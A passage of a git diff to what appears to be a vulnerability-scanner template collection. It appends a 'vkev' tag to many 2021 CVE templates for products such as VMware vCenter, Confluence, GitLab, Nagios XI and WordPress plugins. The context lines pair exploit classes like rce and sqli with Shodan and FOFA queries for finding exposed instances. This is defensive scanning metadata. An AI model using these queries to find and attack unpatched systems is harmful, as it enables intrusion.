body="http://jellyfin.media" google-query: intitle:"jellyfin" - tags: cve,cve2021,jellyfin,lfi + tags: cve,cve2021,jellyfin,lfi,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-21479.yaml b/http/cves/2021/CVE-2021-21479.yaml index 9b3e0865897..035d99f3a9d 100644 --- a/http/cves/2021/CVE-2021-21479.yaml +++ b/http/cves/2021/CVE-2021-21479.yaml @@ -29,7 +29,7 @@ info: max-request: 1 vendor: sap product: scimono - tags: cve,cve2021,scimono,rce,sap + tags: cve,cve2021,scimono,rce,sap,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-21745.yaml b/http/cves/2021/CVE-2021-21745.yaml index 8f3580304d3..22c963ed51f 100644 --- a/http/cves/2021/CVE-2021-21745.yaml +++ b/http/cves/2021/CVE-2021-21745.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: zte product: mf971r_firmware - tags: cve2021,cve,zte,auth-bypass,router + tags: cve2021,cve,zte,auth-bypass,router,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-21801.yaml b/http/cves/2021/CVE-2021-21801.yaml index 1de7ba8b4e0..3a5bb45f1a8 100644 --- a/http/cves/2021/CVE-2021-21801.yaml +++ b/http/cves/2021/CVE-2021-21801.yaml @@ -28,7 +28,7 @@ info: product: r-seenet shodan-query: http.html:"r-seenet" fofa-query: body="r-seenet" - tags: cve2021,cve,rseenet,xss,graph,advantech + tags: cve2021,cve,rseenet,xss,graph,advantech,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-21805.yaml b/http/cves/2021/CVE-2021-21805.yaml index b1225302f66..7a3bdb772ad 100644 --- a/http/cves/2021/CVE-2021-21805.yaml +++ b/http/cves/2021/CVE-2021-21805.yaml @@ -33,7 +33,7 @@ info: - http.html:"R-SeeNet" - http.html:"r-seenet" fofa-query: body="r-seenet" - tags: cve2021,cve,rce,r-seenet,advantech + tags: cve2021,cve,rce,r-seenet,advantech,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-21881.yaml b/http/cves/2021/CVE-2021-21881.yaml index 0481f602fc8..37093552bd2 100644 --- a/http/cves/2021/CVE-2021-21881.yaml +++ b/http/cves/2021/CVE-2021-21881.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: lantronix product: premierwave_2050_firmware - tags: cve2021,cve,lantronix,rce,oast,cisco + tags: cve2021,cve,lantronix,rce,oast,cisco,vkev variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2021/CVE-2021-21972.yaml b/http/cves/2021/CVE-2021-21972.yaml index 2b24dd896b7..901e5911e12 100644 --- a/http/cves/2021/CVE-2021-21972.yaml +++ b/http/cves/2021/CVE-2021-21972.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: vmware product: cloud_foundation - tags: cve2021,cve,vmware,rce,vcenter,kev,packetstorm + tags: cve2021,cve,vmware,rce,vcenter,kev,packetstorm,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-21973.yaml b/http/cves/2021/CVE-2021-21973.yaml index e73f2b66fc5..fede7471f74 100644 --- a/http/cves/2021/CVE-2021-21973.yaml +++ b/http/cves/2021/CVE-2021-21973.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: vmware product: cloud_foundation - tags: cve2021,cve,vmware,ssrf,vcenter,oast,kev + tags: cve2021,cve,vmware,ssrf,vcenter,oast,kev,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-21975.yaml b/http/cves/2021/CVE-2021-21975.yaml index 9c345b2d76d..b96c5ffe9ad 100644 --- a/http/cves/2021/CVE-2021-21975.yaml +++ b/http/cves/2021/CVE-2021-21975.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: vmware product: cloud_foundation - tags: cve2021,cve,kev,packetstorm,ssrf,vmware,vrealize + tags: cve2021,cve,kev,packetstorm,ssrf,vmware,vrealize,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-21978.yaml b/http/cves/2021/CVE-2021-21978.yaml index e3d1b3f28fc..2722c157931 100644 --- a/http/cves/2021/CVE-2021-21978.yaml +++ b/http/cves/2021/CVE-2021-21978.yaml @@ -30,7 +30,7 @@ info: max-request: 1 vendor: vmware product: view_planner - tags: cve2021,cve,vmware,rce,packetstorm,fileupload,intrusive + tags: cve2021,cve,vmware,rce,packetstorm,fileupload,intrusive,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-21985.yaml b/http/cves/2021/CVE-2021-21985.yaml index 5cf020130b5..25428d37bae 100644 --- a/http/cves/2021/CVE-2021-21985.yaml +++ b/http/cves/2021/CVE-2021-21985.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: vmware product: vcenter_server - tags: cve2021,cve,packetstorm,rce,vsphere,vmware,kev + tags: cve2021,cve,packetstorm,rce,vsphere,vmware,kev,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-22005.yaml b/http/cves/2021/CVE-2021-22005.yaml index d856a7736a5..f72f8c1cdcf 100644 --- a/http/cves/2021/CVE-2021-22005.yaml +++ b/http/cves/2021/CVE-2021-22005.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: vmware product: cloud_foundation - tags: cve2021,cve,vmware,vcenter,fileupload,kev,intrusive + tags: cve2021,cve,vmware,vcenter,fileupload,kev,intrusive,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-22053.yaml b/http/cves/2021/CVE-2021-22053.yaml index 30285d63827..a788c2c356b 100644 --- a/http/cves/2021/CVE-2021-22053.yaml +++ b/http/cves/2021/CVE-2021-22053.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: vmware product: spring_cloud_netflix - tags: cve,cve2021,rce,spring,vmware + tags: cve,cve2021,rce,spring,vmware,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml index cdb83326faf..4c08bbc7171 100644 --- a/http/cves/2021/CVE-2021-22054.yaml +++ b/http/cves/2021/CVE-2021-22054.yaml @@ -30,7 +30,7 @@ info: fofa-query: - banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx" - banner="/airwatch/default.aspx" || header="/airwatch/default.aspx" - tags: cve2021,cve,vmware,workspace,ssrf + tags: cve2021,cve,vmware,workspace,ssrf,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml index 341ab000652..7559687d2ec 100644 --- a/http/cves/2021/CVE-2021-22122.yaml +++ b/http/cves/2021/CVE-2021-22122.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.title:"fortiweb - " fofa-query: title="fortiweb - " google-query: intitle:"fortiweb - " - tags: cve2021,cve,fortiweb,xss,fortinet + tags: cve2021,cve,fortiweb,xss,fortinet,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-22205.yaml b/http/cves/2021/CVE-2021-22205.yaml index c760df5065b..c8c42221e5c 100644 --- a/http/cves/2021/CVE-2021-22205.yaml +++ b/http/cves/2021/CVE-2021-22205.yaml @@ -35,7 +35,7 @@ info: - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" - tags: cve2021,cve,kev,hackerone,gitlab,rce + tags: cve2021,cve,kev,hackerone,gitlab,rce,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-22214.yaml b/http/cves/2021/CVE-2021-22214.yaml index 243ee870e28..afca78bb2c6 100644 --- a/http/cves/2021/CVE-2021-22214.yaml +++ b/http/cves/2021/CVE-2021-22214.yaml @@ -37,7 +37,7 @@ info: - http.title:"gitlab" fofa-query: title="gitlab" google-query: intitle:"gitlab" - tags: cve2021,cve,gitlab,ssrf + tags: cve2021,cve,gitlab,ssrf,vkev http: - method: POST diff --git a/http/cves/2021/CVE-2021-22502.yaml b/http/cves/2021/CVE-2021-22502.yaml index 28a68dcceec..b5f39461e60 100644 --- a/http/cves/2021/CVE-2021-22502.yaml +++ b/http/cves/2021/CVE-2021-22502.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: microfocus product: operation_bridge_reporter - tags: cve2021,cve,microfocus,obr,rce,kev + tags: cve2021,cve,microfocus,obr,rce,kev,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-22707.yaml b/http/cves/2021/CVE-2021-22707.yaml index ab2284b88fe..f4fe9d4954a 100644 --- a/http/cves/2021/CVE-2021-22707.yaml +++ b/http/cves/2021/CVE-2021-22707.yaml @@ -32,7 +32,7 @@ info: - title="EVSE web interface" - title="evse web interface" google-query: intitle:"evse web interface" - tags: cve2021,cve,evlink,auth-bypass,schneider-electric + tags: cve2021,cve,evlink,auth-bypass,schneider-electric,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml index fc75b8672e7..e63e4779c16 100644 --- a/http/cves/2021/CVE-2021-22873.yaml +++ b/http/cves/2021/CVE-2021-22873.yaml @@ -35,7 +35,7 @@ info: - icon_hash=106844876 - title="revive adserver" google-query: intitle:"revive adserver" - tags: cve2021,cve,hackerone,seclists,packetstorm,redirect,revive,revive-adserver + tags: cve2021,cve,hackerone,seclists,packetstorm,redirect,revive,revive-adserver,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml index e8144ee0112..8e9f99a1988 100644 --- a/http/cves/2021/CVE-2021-22911.yaml +++ b/http/cves/2021/CVE-2021-22911.yaml @@ -34,7 +34,7 @@ info: - http.title:"rocket.chat" fofa-query: title="rocket.chat" google-query: intitle:"rocket.chat" - tags: cve2021,cve,rocketchat,nosqli,packetstorm,vulhub,hackerone,rocket.chat,sqli + tags: cve2021,cve,rocketchat,nosqli,packetstorm,vulhub,hackerone,rocket.chat,sqli,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-22986.yaml b/http/cves/2021/CVE-2021-22986.yaml index 81fd98be027..afe093ea496 100644 --- a/http/cves/2021/CVE-2021-22986.yaml +++ b/http/cves/2021/CVE-2021-22986.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.title:"big-ip®-+redirect" +"server" fofa-query: title="big-ip®-+redirect" +"server" google-query: intitle:"big-ip®-+redirect" +"server" - tags: cve,cve2021,bigip,rce,kev,packetstorm,f5 + tags: cve,cve2021,bigip,rce,kev,packetstorm,f5,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-24170.yaml b/http/cves/2021/CVE-2021-24170.yaml index a54e20f1de2..672b5c2f7ad 100644 --- a/http/cves/2021/CVE-2021-24170.yaml +++ b/http/cves/2021/CVE-2021-24170.yaml @@ -24,7 +24,7 @@ info: framework: wordpress fofa-query: body="/wp-content/plugins/metronet-profile-picture" publicwww-query: "/wp-content/plugins/metronet-profile-picture" - tags: cve,cve2021,wp,wp-plugin,wpscan,wordpress,info-leak,authenticated,metronet-profile-picture + tags: cve,cve2021,wp,wp-plugin,wpscan,wordpress,info-leak,authenticated,metronet-profile-picture,vkev flow: http(1) && http(2) && http(3) diff --git a/http/cves/2021/CVE-2021-24227.yaml b/http/cves/2021/CVE-2021-24227.yaml index 978090bbc40..a1850f2eac6 100644 --- a/http/cves/2021/CVE-2021-24227.yaml +++ b/http/cves/2021/CVE-2021-24227.yaml @@ -28,7 +28,7 @@ info: vendor: patreon product: patreon_wordpress framework: wordpress - tags: cve,cve2021,wordpress,patreon-connect,unauth,lfi,patreon,wp,wpscan + tags: cve,cve2021,wordpress,patreon-connect,unauth,lfi,patreon,wp,wpscan,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-24278.yaml b/http/cves/2021/CVE-2021-24278.yaml index cba37415e64..1a0e3ed2410 100644 --- a/http/cves/2021/CVE-2021-24278.yaml +++ b/http/cves/2021/CVE-2021-24278.yaml @@ -28,7 +28,7 @@ info: vendor: querysol product: redirection_for_contact_form_7 framework: wordpress - tags: cve2021,cve,wordpress,wp-plugin,wpscan,querysol + tags: cve2021,cve,wordpress,wp-plugin,wpscan,querysol,vkev http: - method: POST diff --git a/http/cves/2021/CVE-2021-24284.yaml b/http/cves/2021/CVE-2021-24284.yaml index 582ea55bdd7..3372de77400 100644 --- a/http/cves/2021/CVE-2021-24284.yaml +++ b/http/cves/2021/CVE-2021-24284.yaml @@ -30,7 +30,7 @@ info: vendor: kaswara_project product: kaswara framework: wordpress - tags: cve2021,cve,intrusive,unauth,fileupload,wpscan,wordpress,wp-plugin,rce,wp,kaswara_project + tags: cve2021,cve,intrusive,unauth,fileupload,wpscan,wordpress,wp-plugin,rce,wp,kaswara_project,vkev variables: zip_file: "{{to_lower(rand_text_alpha(6))}}" php_file: "{{to_lower(rand_text_alpha(2))}}.php" diff --git a/http/cves/2021/CVE-2021-24285.yaml b/http/cves/2021/CVE-2021-24285.yaml index 60397dd1055..4605e3863b6 100644 --- a/http/cves/2021/CVE-2021-24285.yaml +++ b/http/cves/2021/CVE-2021-24285.yaml @@ -28,7 +28,7 @@ info: vendor: cars-seller-auto-classifieds-script_project product: cars-seller-auto-classifieds-script framework: wordpress - tags: cve2021,cve,wordpress,wp-plugin,sqli,wpscan,cars-seller-auto-classifieds-script_project + tags: cve2021,cve,wordpress,wp-plugin,sqli,wpscan,cars-seller-auto-classifieds-script_project,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-24370.yaml b/http/cves/2021/CVE-2021-24370.yaml index f9841eb5520..f4374461847 100644 --- a/http/cves/2021/CVE-2021-24370.yaml +++ b/http/cves/2021/CVE-2021-24370.yaml @@ -30,7 +30,7 @@ info: product: fancy_product_designer framework: wordpress google-query: inurl:“/wp-content/plugins/fancy-product-designer” - tags: cve2021,cve,wordpress,wp,seclists,wpscan,rce,wp-plugin,fancyproduct,radykal + tags: cve2021,cve,wordpress,wp,seclists,wpscan,rce,wp-plugin,fancyproduct,radykal,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-24442.yaml b/http/cves/2021/CVE-2021-24442.yaml index 24d48a675e3..2f785f0e783 100644 --- a/http/cves/2021/CVE-2021-24442.yaml +++ b/http/cves/2021/CVE-2021-24442.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/polls-widget/ fofa-query: body=/wp-content/plugins/polls-widget/ publicwww-query: "/wp-content/plugins/polls-widget/" - tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli,wpdevart + tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli,wpdevart,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-24498.yaml b/http/cves/2021/CVE-2021-24498.yaml index 69940963941..0d078afa6f1 100644 --- a/http/cves/2021/CVE-2021-24498.yaml +++ b/http/cves/2021/CVE-2021-24498.yaml @@ -27,7 +27,7 @@ info: vendor: dwbooster product: calendar_event_multi_view framework: wordpress - tags: cve2021,cve,xss,wordpress,wp-plugin,wpscan,dwbooster + tags: cve2021,cve,xss,wordpress,wp-plugin,wpscan,dwbooster,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-24499.yaml b/http/cves/2021/CVE-2021-24499.yaml index d5a716ff40f..526d849dfce 100644 --- a/http/cves/2021/CVE-2021-24499.yaml +++ b/http/cves/2021/CVE-2021-24499.yaml @@ -28,7 +28,7 @@ info: vendor: amentotech product: workreap framework: wordpress - tags: cve,cve2021,wpscan,packetstorm,rce,workreap,wordpress,wp-plugin,intrusive,wp,amentotech + tags: cve,cve2021,wpscan,packetstorm,rce,workreap,wordpress,wp-plugin,intrusive,wp,amentotech,vkev variables: string: "CVE-2021-24499" diff --git a/http/cves/2021/CVE-2021-24527.yaml b/http/cves/2021/CVE-2021-24527.yaml index 4b2b47c4257..895091ff221 100644 --- a/http/cves/2021/CVE-2021-24527.yaml +++ b/http/cves/2021/CVE-2021-24527.yaml @@ -24,7 +24,7 @@ info: vendor: cozmoslabs product: profile-builder publicwww-query: "/wp-content/plugins/profile-builder/" - tags: cve,cve2021,wp,wp-plugin,wordpress,profile-builder + tags: cve,cve2021,wp,wp-plugin,wordpress,profile-builder,vkev variables: pass: "{{to_lower(rand_text_alpha(12))}}" diff --git a/http/cves/2021/CVE-2021-24644.yaml b/http/cves/2021/CVE-2021-24644.yaml index b0a4d652af0..2b6b16ce7e8 100644 --- a/http/cves/2021/CVE-2021-24644.yaml +++ b/http/cves/2021/CVE-2021-24644.yaml @@ -25,7 +25,7 @@ info: product: images_to_webp framework: wordpress publicwww-query: "/wp-content/plugins/images-to-webp/" - tags: wpscan,cve,cve2021,wordpress,wp-plugin,images-to-webp,lfi,authenticated,intrusive + tags: wpscan,cve,cve2021,wordpress,wp-plugin,images-to-webp,lfi,authenticated,intrusive,vkev flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-24647.yaml b/http/cves/2021/CVE-2021-24647.yaml index b32728fdd8b..15969f5cb6c 100644 --- a/http/cves/2021/CVE-2021-24647.yaml +++ b/http/cves/2021/CVE-2021-24647.yaml @@ -27,7 +27,7 @@ info: vendor: genetechsolutions product: pie_register framework: wordpress - tags: cve,cve2021,unauth,pie-register,wpscan,wp-plugin,wordpress,wp,genetechsolutions + tags: cve,cve2021,unauth,pie-register,wpscan,wp-plugin,wordpress,wp,genetechsolutions,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-24666.yaml b/http/cves/2021/CVE-2021-24666.yaml index 844ac9810ba..55f123e388c 100644 --- a/http/cves/2021/CVE-2021-24666.yaml +++ b/http/cves/2021/CVE-2021-24666.yaml @@ -28,7 +28,7 @@ info: vendor: podlove product: podlove_podcast_publisher framework: wordpress - tags: cve2021,cve,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,podlove + tags: cve2021,cve,sqli,wordpress,wp-plugin,wp,podlove-podcasting-plugin-for-wordpress,wpscan,podlove,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-24750.yaml b/http/cves/2021/CVE-2021-24750.yaml index bb2ff03f985..928e98d45e2 100644 --- a/http/cves/2021/CVE-2021-24750.yaml +++ b/http/cves/2021/CVE-2021-24750.yaml @@ -28,7 +28,7 @@ info: vendor: wp_visitor_statistics_\(real_time_traffic\)_project product: wp_visitor_statistics_\(real_time_traffic\) framework: wordpress - tags: cve2021,cve,authenticated,wpscan,sqli,wp,wordpress,wp-plugin,wp_visitor_statistics_\(real_time_traffic\)_project + tags: cve2021,cve,authenticated,wpscan,sqli,wp,wordpress,wp-plugin,wp_visitor_statistics_\(real_time_traffic\)_project,vkev variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-24762.yaml b/http/cves/2021/CVE-2021-24762.yaml index 4e4bc0a5168..0e31c3600e1 100644 --- a/http/cves/2021/CVE-2021-24762.yaml +++ b/http/cves/2021/CVE-2021-24762.yaml @@ -28,7 +28,7 @@ info: vendor: getperfectsurvey product: perfect_survey framework: wordpress - tags: time-based-sqli,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey + tags: time-based-sqli,cve2021,cve,wpscan,sqli,wp,wordpress,wp-plugin,edb,getperfectsurvey,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-24827.yaml b/http/cves/2021/CVE-2021-24827.yaml index a18293f9e76..b718b20c138 100644 --- a/http/cves/2021/CVE-2021-24827.yaml +++ b/http/cves/2021/CVE-2021-24827.yaml @@ -30,7 +30,7 @@ info: vendor: asgaros product: asgaros_forum framework: wordpress - tags: time-based-sqli,cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros + tags: time-based-sqli,cve2021,cve,wp-plugin,asgaros-forum,unauth,wpscan,wordpress,wp,sqli,asgaros,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-24876.yaml b/http/cves/2021/CVE-2021-24876.yaml index 7af0531e1bc..0daced6b9c0 100644 --- a/http/cves/2021/CVE-2021-24876.yaml +++ b/http/cves/2021/CVE-2021-24876.yaml @@ -24,7 +24,7 @@ info: framework: wordpress fofa-query: body="/wp-content/plugins/registrations-for-the-events-calendar/" publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/" - tags: cve,cve2021,wordpress,wpscan,wp-plugin,wp,registrations-for-the-events-calendar,xss,authenticated + tags: cve,cve2021,wordpress,wpscan,wp-plugin,wp,registrations-for-the-events-calendar,xss,authenticated,vkev flow: http(1) && http(2) diff --git a/http/cves/2021/CVE-2021-24878.yaml b/http/cves/2021/CVE-2021-24878.yaml index 5964107e3bf..0f9b6fef1d2 100644 --- a/http/cves/2021/CVE-2021-24878.yaml +++ b/http/cves/2021/CVE-2021-24878.yaml @@ -27,7 +27,7 @@ info: framework: wordpress fofa-query: body="/wp-content/plugins/supportcandy/" publicwww-query: "/wp-content/plugins/supportcandy/" - tags: cve,cve2021,wordpress,wpscan,wp-plugin,supportcandy,xss + tags: cve,cve2021,wordpress,wpscan,wp-plugin,supportcandy,xss,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-24931.yaml b/http/cves/2021/CVE-2021-24931.yaml index 5353b0f6cb3..68e7513059e 100644 --- a/http/cves/2021/CVE-2021-24931.yaml +++ b/http/cves/2021/CVE-2021-24931.yaml @@ -28,7 +28,7 @@ info: vendor: ays-pro product: secure_copy_content_protection_and_content_locking framework: wordpress - tags: time-based-sqli,cve2021,cve,wp-plugin,wp,packetstorm,unauth,wpscan,sqli,wordpress,secure-copy-content-protection,ays-pro + tags: time-based-sqli,cve2021,cve,wp-plugin,wp,packetstorm,unauth,wpscan,sqli,wordpress,secure-copy-content-protection,ays-pro,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-24943.yaml b/http/cves/2021/CVE-2021-24943.yaml index 83dd5e3c8b3..50f6994ad75 100644 --- a/http/cves/2021/CVE-2021-24943.yaml +++ b/http/cves/2021/CVE-2021-24943.yaml @@ -28,7 +28,7 @@ info: shodan-query: http.html:/wp-content/plugins/registrations-for-the-events-calendar/ fofa-query: body=/wp-content/plugins/registrations-for-the-events-calendar/ publicwww-query: "/wp-content/plugins/registrations-for-the-events-calendar/" - tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar,roundupwp + tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,sqli,registrations-for-the-events-calendar,roundupwp,vkev variables: text: "{{rand_base(5)}}" diff --git a/http/cves/2021/CVE-2021-24946.yaml b/http/cves/2021/CVE-2021-24946.yaml index 7032503b0a2..23854e8b0cf 100644 --- a/http/cves/2021/CVE-2021-24946.yaml +++ b/http/cves/2021/CVE-2021-24946.yaml @@ -30,7 +30,7 @@ info: vendor: webnus product: modern_events_calendar_lite framework: wordpress - tags: time-based-sqli,cve2021,cve,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,modern-events-calendar-lite,wordpress,webnus + tags: time-based-sqli,cve2021,cve,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,modern-events-calendar-lite,wordpress,webnus,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-25003.yaml b/http/cves/2021/CVE-2021-25003.yaml index 943db7b10b2..dd3e451c766 100644 --- a/http/cves/2021/CVE-2021-25003.yaml +++ b/http/cves/2021/CVE-2021-25003.yaml @@ -30,7 +30,7 @@ info: vendor: wptaskforce product: wpcargo_track_\&_trace framework: wordpress - tags: cve2021,cve,rce,wpcargo,unauth,wordpress,wp,wp-plugin,wpscan,intrusive,wptaskforce + tags: cve2021,cve,rce,wpcargo,unauth,wordpress,wp,wp-plugin,wpscan,intrusive,wptaskforce,vkev variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-25032.yaml b/http/cves/2021/CVE-2021-25032.yaml index f4bd0240037..84aab202257 100644 --- a/http/cves/2021/CVE-2021-25032.yaml +++ b/http/cves/2021/CVE-2021-25032.yaml @@ -28,7 +28,7 @@ info: product: capabilities framework: wordpress fofa-query: body="/wp-content/plugins/capability-manager-enhanced" - tags: wpscan,cve,cve2021,wordpress,wp-plugin,wp,capability-manager-enhanced,authenticated + tags: wpscan,cve,cve2021,wordpress,wp-plugin,wp,capability-manager-enhanced,authenticated,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-25094.yaml b/http/cves/2021/CVE-2021-25094.yaml index 2da31dfb243..c880d9903c1 100644 --- a/http/cves/2021/CVE-2021-25094.yaml +++ b/http/cves/2021/CVE-2021-25094.yaml @@ -23,7 +23,7 @@ info: max-request: 2 verified: true publicwww-query: "/wp-content/plugins/tatsu/" - tags: cve,cve2021,wp,wp-plugin,wordpress,tatsu,rce + tags: cve,cve2021,wp,wp-plugin,wordpress,tatsu,rce,vkev variables: marker: "{{randstr}}" diff --git a/http/cves/2021/CVE-2021-25114.yaml b/http/cves/2021/CVE-2021-25114.yaml index fea0df2bf64..18051d4415a 100644 --- a/http/cves/2021/CVE-2021-25114.yaml +++ b/http/cves/2021/CVE-2021-25114.yaml @@ -34,7 +34,7 @@ info: fofa-query: body=/wp-content/plugins/paid-memberships-pro/ publicwww-query: /wp-content/plugins/paid-memberships-pro/ google-query: inurl:"/wp-content/plugins/paid-memberships-pro" - tags: time-based-sqli,cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios + tags: time-based-sqli,cve2021,cve,wp-plugin,wp,sqli,paid-memberships-pro,wpscan,wordpress,strangerstudios,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-25296.yaml b/http/cves/2021/CVE-2021-25296.yaml index 8745a1d2b00..f03a01c18c2 100644 --- a/http/cves/2021/CVE-2021-25296.yaml +++ b/http/cves/2021/CVE-2021-25296.yaml @@ -36,7 +36,7 @@ info: - title="nagios xi" - app="nagios-xi" google-query: intitle:"nagios xi" - tags: cve,cve2021,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios + tags: cve,cve2021,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-25297.yaml b/http/cves/2021/CVE-2021-25297.yaml index eed8021db3a..3a413bf8570 100644 --- a/http/cves/2021/CVE-2021-25297.yaml +++ b/http/cves/2021/CVE-2021-25297.yaml @@ -36,7 +36,7 @@ info: - title="nagios xi" - app="nagios-xi" google-query: intitle:"nagios xi" - tags: cve2021,cve,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios + tags: cve2021,cve,packetstorm,rce,oast,authenticated,msf,nagiosxi,kev,nagios,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-25298.yaml b/http/cves/2021/CVE-2021-25298.yaml index 06cbeb93121..4cb6c2e6e6c 100644 --- a/http/cves/2021/CVE-2021-25298.yaml +++ b/http/cves/2021/CVE-2021-25298.yaml @@ -36,7 +36,7 @@ info: - title="nagios xi" - app="nagios-xi" google-query: intitle:"nagios xi" - tags: cve2021,cve,packetstorm,oast,authenticated,msf,nagiosxi,rce,kev,nagios + tags: cve2021,cve,packetstorm,oast,authenticated,msf,nagiosxi,rce,kev,nagios,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-25646.yaml b/http/cves/2021/CVE-2021-25646.yaml index 7033a926ae0..567605d39bf 100644 --- a/http/cves/2021/CVE-2021-25646.yaml +++ b/http/cves/2021/CVE-2021-25646.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: apache product: druid - tags: cve2021,cve,apache,rce,druid + tags: cve2021,cve,apache,rce,druid,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-25864.yaml b/http/cves/2021/CVE-2021-25864.yaml index 170f9f3f5dc..f6d05cd50ba 100644 --- a/http/cves/2021/CVE-2021-25864.yaml +++ b/http/cves/2021/CVE-2021-25864.yaml @@ -32,7 +32,7 @@ info: - http.title:"node-red" fofa-query: title="node-red" google-query: intitle:"node-red" - tags: cve2021,cve,huemagic,lfi,dgtl,node.js + tags: cve2021,cve,huemagic,lfi,dgtl,node.js,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-25899.yaml b/http/cves/2021/CVE-2021-25899.yaml index c356384030b..10c0800b2cd 100644 --- a/http/cves/2021/CVE-2021-25899.yaml +++ b/http/cves/2021/CVE-2021-25899.yaml @@ -31,7 +31,7 @@ info: - html:"AURALL" - http.html:"aurall" fofa-query: body="aurall" - tags: time-based-sqli,cve2021,cve,sqli,void,aurall + tags: time-based-sqli,cve2021,cve,sqli,void,aurall,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-26084.yaml b/http/cves/2021/CVE-2021-26084.yaml index af8a5b23833..cc4b4f3bda4 100644 --- a/http/cves/2021/CVE-2021-26084.yaml +++ b/http/cves/2021/CVE-2021-26084.yaml @@ -31,7 +31,7 @@ info: - http.component:"Atlassian Confluence" - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" - tags: cve2021,cve,rce,confluence,injection,ognl,kev,atlassian + tags: cve2021,cve,rce,confluence,injection,ognl,kev,atlassian,vkev http: - raw: diff --git a/http/cves/2021/CVE-2021-26085.yaml b/http/cves/2021/CVE-2021-26085.yaml index eeeb358fe13..5df737f9bf5 100644 --- a/http/cves/2021/CVE-2021-26085.yaml +++ b/http/cves/2021/CVE-2021-26085.yaml @@ -31,7 +31,7 @@ info: - http.component:"Atlassian Confluence" - http.component:"atlassian confluence" fofa-query: app="atlassian-confluence" - tags: cve2021,cve,kev,packetstorm,confluence,atlassian,lfi,intrusive + tags: cve2021,cve,kev,packetstorm,confluence,atlassian,lfi,intrusive,vkev http: - method: GET diff --git a/http/cves/2021/CVE-2021-26086.yaml b/http/cves/2021/CVE-2021-26086.yaml index 5c6a0391f7c..0f7a549836f 100644 --- a/http/cves/2021/CVE-2021-26086.yaml +++ b/http/cves/2021/CVE-2021-26086.yaml @@ -30,7 +30,7 @@ info: shodan-query: - http.component:"Atlassian Jira" - http.component:"atlassian jira" - tags: 